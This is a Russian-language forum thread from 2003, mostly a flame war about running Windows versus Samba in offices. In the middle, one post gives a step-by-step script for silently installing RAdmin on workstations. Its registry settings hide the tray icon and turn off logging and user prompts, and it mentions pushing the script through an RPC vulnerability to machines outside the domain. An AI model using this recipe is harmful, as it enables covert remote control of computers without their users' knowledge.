2Irsi

Не, у меня с точностью до наоборот :(

Ну, не знаю, кому из вас больше повезло в жизни, мужики...

Хотя, imho sS (*)...

<<<>У меня винда не падает и все что мне нужно в ней работает... Скажите, что я не так делаю? :)

Скорее всего ты в ней ничего почти и не делаешь. Отсюда и бравада.>>>

Эт вы зря... а пасьянсы раскладывать, это что по вашему - ничего не делать?

<<< Ага, купил... у меня дома писюк (WinXP), второй писюк (QNX), мак (MacOS X), альфа (freebsd)... Еще хочу санки подешке прикупить...:) >>>

Спрашивается, у кого с пальцами проблема-то?

гы.. остается только гадать, сколько минут в день сие создание находится вне "дома"...

<<<> "непрошибаяемая самоуверенность" - IMHO не помеха стать специалистом или в данном контексте хакером.

Однозначно помеха. Ибо излишняя самоуверенность препятствует усвоению новых знаний.>>>

_"непрошибаяемая самоуверенность" - IMHO не помеха_
_Однозначно помеха._

не прошибаемый вы наш, вот и начали бы применять свою теорию на себе самом, а потом уж можно и за других беспокоиться...

> Ага, с каких это пор казлы из культа дохлой коровы стали авторитетными людми и хакерами?! Как были мелкими пакостниками, так и остались...:)

CDC имеет куда больше авторитета чем болтун Реймонд. Тот просто в каждой бочке затычка.

> Тоже знаешь этого хипаря? :))) Кстати исчез он куда-то...

я слышал, этим летом он хотел сделать очередной "СПРЫГ". Но как-то заглохло.

> Да, старенькая DEC alphastation 350... Выменял на К6-2/500 какой-то...

У меня есть SS2, кажется. Отдам бесплатно. Самовывоз из Дюссельдорфа. Для любителей настоящей классики. Там, кажется, SunOS 4 стоит еще. Хотя я не уверен, что она вообще включится.

Ну да, она у меня ничего не делает... Терабайтный массив, AD, DNS (внутренний), DHCP, MS Exchange, MS SQL, MS Project, SharePoint Team Service... Совсем ничего винда не делает...:)
На рабочей станции дома тоже нихера не делает - кроме всякой мультимудии (видео, музыка, иногда - игры), из "серьезного" - фотожоп (увлекаюсь я цифровым фото), немного пейджа, офисс разумеется, по инету шарюсь... Чего еще хотите от домашнего компа? 3D-моделирование? Не увлекаюсь... Видообработка? Ну прикуплю цифровую видеокамеру - буду монтажем заниматься...:)

Ну разумеется, я ничего иного и не ожидал... А на счет спарка - за морем телушка полушка, да дорог перевоз...:( К тому же в мск в принципе можно найти ss5 за 200-300$...

>Заливка рабочих мест внатуре на Windows 95.

Простите, уважаемый начальник саппорта, а Вы в окно давно смотрели? Или всё время на RAdmin уходит? Конец 2003 года на дворе между прочим. Про новые версии Виндов не слыхали? Картина маслом: Enterprise Level без NT.

>Сапортники только втыкают дискету и через сеть вытягивают образ. Но это только в крайних случаях. Заливка идет 25-30 минут. Ты ось поставишь с десятками приложениями за это время? Нет!

Не нужно быть столь категоричным в своих заявлениях. У меня - 15 минут, со всеми прикладухами, без всяких дискет. Что я делаю не так?

>Звонят по телефону, сапорт подключается через 5 секунд, деалет все и отключается.

Ну-ка, ну-ка, расскажи неразумным, как у тебя саппорт к винде под синим экраном через RAdmin подключается.

>Зачем "бегать" если можно "не бегать" и получать то же самое.

Действительно "зачем?". Не бегаю, RAdmin'ы не заливаю, на все компы оперативно заливаю патчи, всё работает. Как так? Ах ну да: "ламер", "руки кривые".

> AD, DNS (внутренний), DHCP, MS Exchange, MS SQL, MS Project, SharePoint Team Service...

Ирся, извращенец, тебе ещё терабайт, ISA поставить, биллинг и Интернет раздавать - для полного счастья. Юморист, блин.

null666

Терабайт это файлопомойка...:) Профили пользователей, софт, доки и прочая мура...:) Ну разумеется там же БД живет и т.д. Одна база эксченча за 10 гиг давно перевалила...:)
ISA я рассматривал, но не как "средство для раздачи инета", а как средство контроля за тем кто куда ходил... Но по ряду причин использую другие средства... Хотя может в будующем... Посмотрим короче...
"Раздает интернет", а именно NAT, VoIP Gateway, VLAN, VPN и т.д. это у меня 3640 озадачена...:)
И я не вижу здесь извращения - чтоб собрать нечто аналогичное на фрюниксах... В теории - можно, а вот на практике - упаришся... Времени кучу убъешь на настройку, а работать лучше не будет, да и фичь поменее будет... А время это деньги...

>Простите, уважаемый начальник саппорта,

Еще раз повторяю - я не админ и не начальник сапорта. Руководитель департамента информационных технологий. Работаю на федералов. Удовлетворен?

> а Вы в окно давно смотрели? Или всё время на RAdmin уходит? Конец 2003 года на дворе между прочим. Про новые версии Виндов не слыхали? Картина маслом: Enterprise Level без NT.

Только и делаю что смотрю в окно, то есть Windows :))) В качестве контроллеров домена используется samba PDC. Слышал про такое? Рекомендую!

>Не нужно быть столь категоричным в своих заявлениях. У меня - 15 минут, со всеми прикладухами, без всяких дискет. Что я делаю не так? ***Irsi???***

Просто врешь.

>Ну-ка, ну-ка, расскажи неразумным, как у тебя саппорт к винде под синим экраном через RAdmin подключается.

А я и не говорил что подключения проходят в такой ситуации. Врешь во второй раз!

>Действительно "зачем?". Не бегаю, RAdmin'ы не заливаю, на все компы оперативно заливаю патчи, всё работает. Как так? Ах ну да: "ламер", "руки кривые".

Патчи можно ставить действительно стартап-скриптом при входе в домен. Или у тебя везде стоят Windows 2000/XP?! И на всех подняты Windows Terminal Servers? или может ты еще Citrix Metaframe на каждый сервер сверху нахлобучил для полного самоудовлетворения? :)))))))))). (100% Irsi).

P.S.: даже когда ты подписываешься anonymous, по уровню интеллекта и форме выражения мыслей можно узнать безошибочно!!! Мой тебе совет - сделай пересадку мозга - единственное средство. Все признаки шизофрении.

Значит так, "Руководитель департамента информационных технологий Федеральной Помойки им. Шарикова, города Малого Засранска" Я ВСЕГДА ПОДПИСЫВАЮСЬ СВОИМ НИКОМ, заруби это себе на носу...
А на счет Samba PDC - это прошлый век, уровень NT4... А мы уже третий год на w2k работаем и вот на w2k3 потихоньку переходить собираемся. Если ты не знаешь насколько отличается доен NT4, от домена w2k, то RTFM начальничек! :)
К слову - у меня действительно везде на воркстейшинах стоит w2k/xp... А что - разве можно в энтерпрайзе использовать 9х?! На дворе XXI век, батенька...:)

2Irsi (*) (04.11.2003 14:03:52)

> А на счет Samba PDC - это прошлый век, уровень NT4...

Irsi, уже вышла Samba 3.0 release (pre вышли раньше), это уровень win2000 (AD)...

А "насколько отличается доен NT4, от домена w2k,"... :)

>К слову - у меня действительно везде на воркстейшинах стоит w2k/xp... А что - разве можно в энтерпрайзе использовать 9х?! На дворе XXI век, батенька...:)

:)))

Врача!!! - мы его теряем!!!.

>Irsi, уже вышла Samba 3.0 release (pre вышли раньше), это уровень win2000 (AD)...

Тут недавно новость пролетала по этому поводу. По производительности Samba 3 уделала MS более чем в два раза.

> Irsi, уже вышла Samba 3.0 release (pre вышли раньше), это уровень win2000 (AD)

LOL! Таакс, сначала читаем что есть AD, а потом понимаем насколько такое заявление смехотворно...:) Подсказка - одна самба ну никак не может обеспечит функциональность всего AD...:)
Любителям кидать ссылки на пузомерки по скорости - кинте заодно пачку ссылок на жалобы по проблемам с третьей самбой :)

Потерялся в версиях Ирси :D

Я вообще-то имел в виду, что не хорошо всё на один сервер вешать. Перераспределить бы нагрузку, по-хорошему...

С уважением, null666.

>Удовлетворен?

Безумно.

>Работаю на федералов.

ФБР использует Samba PDC... Умора! Да тебе я смотрю лавры Жванецкого покоя не дают?! =)

>Только и делаю что смотрю в окно, то есть Windows :))) В качестве контроллеров домена используется samba PDC. Слышал про такое? Рекомендую!

У-первых - это просто LOL использовать Samba в качестве DC (заметь, без Р). У-вторых - а что порекомендуешь на твоём дряхлом железе, годящемся только под '95, использовать в качестве рабочих станций? Пожалуй какой-нить древний BSDi? =)

>А я и не говорил что подключения проходят в такой ситуации. Врешь во второй раз!

"Неправда Ваша". Ты говорил, что в любых ситуация (в том числе ты описал и синий экран) саппорт коннектиться и всё чинит за пять минут.

>Патчи можно ставить действительно стартап-скриптом при входе в домен.

РыдалЪ. Малчик(читать с грузинским акцентом), окстись.

>И на всех подняты Windows Terminal Servers? или может ты еще Citrix Metaframe на каждый сервер сверху нахлобучил для полного самоудовлетворения? :)))))))))). (100% Irsi).

Ты решил меня уморить смехом?

>даже когда ты подписываешься anonymous, по уровню интеллекта и форме выражения мыслей можно узнать безошибочно!!!

\m/ Вай, вай, какие мы крЮтые. \m/ Неважно что пальцы работать мешабт - важно, что регистрация на ЛОР есть. =)

>Мой тебе совет - сделай пересадку мозга - единственное средство.

Имхо, тебе даже это не поможет. Бывай, извращенный, заливай там свой RAdmin ;)

На самом деле их не один разумеется :) Впрочем при нынешних ценах на железо больше двух в моем случае просто не имеет смысла... Как ты понимаешь у меня стоят приличные сервера - один корпус под штуку стоит...:)

2OpenStorm (*) (04.11.2003 15:02:33)

Кстати, Вы умеете обращаться к серверу RAdmin из-под Linux? (насущно)

>Кстати, Вы умеете обращаться к серверу RAdmin из-под Linux? (насущно)

У нас Windows стартует под VMWare. Там пускаю radmin_client - работает нормально. Думаю под Wine тоже должно стартовать (просто не пробовал).

Итак - руководство по захвату контроля над рабочими станциями:

Понадобится стенд, куда предварительно потребуется установить RAdm. Мы использовали VMWare.

На клиенты RAdmin устанавливается двумя способами: для тех кто в домене - стартап-скрипт, для тех кто не в домене и умеет наклонять RPC - можно через него (даже рекомендуется).

1. В скрипте переливаем на рабочее место 3 файла с установленного дистрибутива RAdm: r_server, Admdll.dll, raddrv.dll (~300 КБ - сделать нужно это один раз.) в любое место куда хотим и куда указан path. Рекомендую в %windir%. Регистрить DLL ненадо - это не COM.

2. Дерем необходимые настройки с реестра для radm ( radm уже поставлен на стенде) и лупим их в реестр в том же скрипте с использованием топорного regsvr32 /s (/s - просто затыкаем рот regsvr32 - любит он всякие сообщения выдавать ).

Приблизительное содержание реестра могу дать:

[HKLM\System\RAdmin]

[HKLM\System\RAdmin\v2.0]

[HKLM\System\RAdmin\v2.0\Server]

[HKLM\System\RAdmin\v2.0\Server\Parameters]

"Port"=hex:23,13,00,00

"Timeout"=hex:0a,00,00,00

"EnableLogFile"=hex:00,00,00,00 - затыкаем лог-файл radm

"LogFilePath"="%windir%\\logfile.txt" (должно быть)

"FilterIp"=hex:00,00,00,00 (отрубаем фильтрацию IP)

"DisableTrayIcon"=hex:01,00,00,00 (запрещаем показ контрольной иконки на рабочей станции)

"AutoAllow"=hex:00,00,00,00 - отрубаем

"AskUser"=hex:00,00,00,00 - отрубаем

"EnableEventLog"=hex:00,00,00,00 - отрубаем

"NTAuthEnabled"=hex:00,00,00,00 - отрубаем. У нас могут быть не только NT/XP станции но и Win9X

"Parameter"=hex: А вот тут важно - сюда пишется пароль а ни какой Параметр :))) как написали разработчики RAdm подключения RAdm - устанавливайте пароль на стенде, ставьте там пароль какой надо и вписывайте его зашифрованый код сюда. Рекомендую всем прописать, ибо кто-либо другой может устроить вашей сети огромную раздачу.

[HKLM\System\RAdmin\v2.0\Server\iplist]

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\runservices] "r_server"="%windir%\\R_SERVER.EXE /service" - И вешаем стартап-сервис.

3. Запускаем в скрипте R_Server /service. и все - клиент наш %). Соответственно настройки самбы для PDC думаю должны знать.

Приблизительное содержание стартап-скрипта: @copy \\...\netlogon\r_server.exe %windir% @copy \\...\netlogon\raddrv.dll %windir% @copy \\...\netlogon\admdll.dll %windir% @copy \\...\netlogon\radm.reg %windir% @regedit /s radm.reg @%windir%\R_SERVER.EXE /service

Для тех кто не в домене - использую дыру в RPC - заставляю Windows API запустить тот же самый скрипт. Тем кто знает другие дыры - можете протолкнуть свой скрипт через где умеете.

Как кодировать дыру RPC наверное рассказывать не буду. Чревато последствиями.

P.S.: 2Irsi & anonymous

Так вот о чем это я. Уважаемый Irsi и Irsi V2.0 (злостный anonymous). Просьба на будущее - я если что-то и пишу, то Вас это абсолютно не касается. Если надумаете писать что-нибудь по теме, можно будет обсудить. Иначе просьба не встрявать в темы, в которых не рубите. Думаю что большое количество администраторов скажут мне спасибо за то, что я пытаюсь помочь избавить их сапорт от лишней работы. Я не оспариваю тот факт, что вы (2in1) - чемпионы по метанию дерьма на большие расстояния.

С уважением, Кривошей Александр.

Поправка. В реестр конечно пишем при помощи regedit. Regsvr32 - просто оговорился.

Класс!!! У меня заработало.

OpenStorm

>На клиенты RAdmin устанавливается двумя способами:

Малчик, ти более других методов не в курсе? Ничего не говорят слова "групповая политика", "msi-пакеты", "def-файлы"?

>Как кодировать дыру RPC наверное рассказывать не буду. Чревато последствиями.

Действительно, в соседней сети вон 3 гига в день наматывают, а у меня всё тихо и спокойно.

>Так вот о чем это я. Уважаемый Irsi и Irsi V2.0 (злостный anonymous). Просьба на будущее - я если что-то и пишу, то Вас это абсолютно не касается.

Мда, может ещё скриптик подкинешь, который реализует правило блокировки твоих мессаг для наших мозгов?

>Иначе просьба не встрявать в темы, в которых не рубите.

Паря, тебе череп не жмет? А пальцы в дверь ещё проходят? ;)

>Думаю что большое количество администраторов скажут мне спасибо за то, что я пытаюсь помочь избавить их сапорт от лишней работы.

Действительно: лучше добавить им работы по разгребанию причин жуткого торможения сети и неработающего Copy&Paste.

>У нас Windows стартует под VMWare.

РыдалЪ. А ещё RAdmin через дыры в RPC... Вы случаем гланды не через задний проход удаляете?

>Малчик, ти более других методов не в курсе? Ничего не говорят слова "групповая политика", "msi-пакеты", "def-файлы"?

"Групповая политика", "msi-пакеты" и "def-файлы". Набор слов. Ну и расскажи ;)))

OpenStorm все по полкам разложил, а у тебя только понты, намеки, абстракция да грязь. Во всяком случае я по его описанию поставил и у меня заработало. Из твоего же постинга пользы - 0.

Андрей - не трогай его.

У него кое-что уже заблокировано. Никакие скрипты не помогут.

> Никакие скрипты не помогут.

Как насчет эксплоита?

http://www.enterprisemission.com/glyph.htm Вот может кто расшифрует этот знак :-)))))

ignat

Ну например

AIC - компьютер с искусственным интелектом

У меня нэ работает. :)
Почему? Ну видимо потому что нэ пыонэры сеть делали, права и груповые полити настраивали...:)

Да, у пионеров - работает.

;)

>"Групповая политика", "msi-пакеты" и "def-файлы". Набор слов. Ну и расскажи ;)))

"Я вот что-то не пойму, кто это у нас тут в запое"(с)Гоблин. В наличие смайлика в конце рассматривать как шутку? Или ты серьезно?

На всякий случай на тебе линк, а то скажешь, что я опять в абстракции полез: http://rsdn.ru/article/install/wininstaller.xml

>а у тебя только понты, намеки, абстракция да грязь

Культурно промолчу. Устроит? :)

>Во всяком случае я по его описанию поставил и у меня заработало

Родной, а ты кроме "Мой компьютер" что-нибудь открывал? Я конечно понимаю, что ты настолько крут, что документацию читать - не твой стиль, а пальцы, заклинившие в одной позиции, уже не могут удеражть книжку. Но объясни мне - какого хрена ты в администраторы-то пошёл? Чиста понтов перед друганами кинуть - типа я крутой админ, а как известно крутой админ - крутой хакер.

У пыонеров и известный скрип на перле работает... Здесь в конфах пробегало - я долго смеялся...:)
У тебя видимо юзверя локального админа имеют, да? НУ-НУ...:)

Хм. Странно. Если работаешь на федералов то должен был подписывать бумагу о неразглашении. Если подписывал то не стал бы кричать о работе на форуме.

http://www.enterprisemission.com/glyph.htm Вот может кто расшифрует этот знак :-)))))

там же написано: human/feline hybrid

Х-м... ну причислить себя к хакерам, я думаю, что не смогу. Просто программер, который знает С/С++ и асм (x86), и пишет кучу системного софта под эти системы (в базах данных - не волоку, это кстати о профессиональности, но если разобратся, то и это слабать можно... :) Хакеры, кто они такие? Ничего окромя такого скромного объяснения мне вголову не приходит, надо было назвать человека, который сидит вникает в суть работы компа - железа и софта (в лохматых 60-х - 70-х годах) вот и назвали - HACKER (hack-er - подсказка :))... Разбор слова сделайте... ну я думаю, здесь мало людей которые чувтсвуют наслождение при работе с отладчиком (например с файлом размером пару сотен кил и больше.... :))). Ну так собственно это все к чему? Для чего вся эта х... нужна, в том смысле - у линукса есть логотип - есть Линукс!, у BSD есть логотип - есть BSD, у GNU.... и т. д. И у Хакеров есть свои логотипы. Чё кто-то хочет сделать опись населения хакеров? или официальную контору по найму хакеров???? Лично мне, как-то не очень хочется попадать под эту опись... Так можно и "петлю" незаметно, для себя, на шею завесить. Опять же если считать хакерами людей которые ломают "все че стоит у них на пути" и являются профи...., то после взлома - они не оставят о себе никаких следов и упоминаний... и определить, что была взломана система можно будет не сразу(был опыт..., печально было сначала, а потом стало смешно... нас ломанули просто из-за того, что перепутали IP адрес!!!). То спрашивается нах.... ему нужон этот лого??? Чтоб быстрее его поймали (как были случаи с подростками.... которые трендели в форумах... какие они крутые и всемогущие... ломану сервак, написали вирь и все такое....) и тишина... вокруг... матросская и небо голубое в полосочку.... :))) Гы... мдя.... фигня какая-то получается.... :)

ruslanz

Irsi - мудак

Irsi - мудак

всем читать определения здесь:
http://www.catb.org/~esr/faqs/hacker-howto.html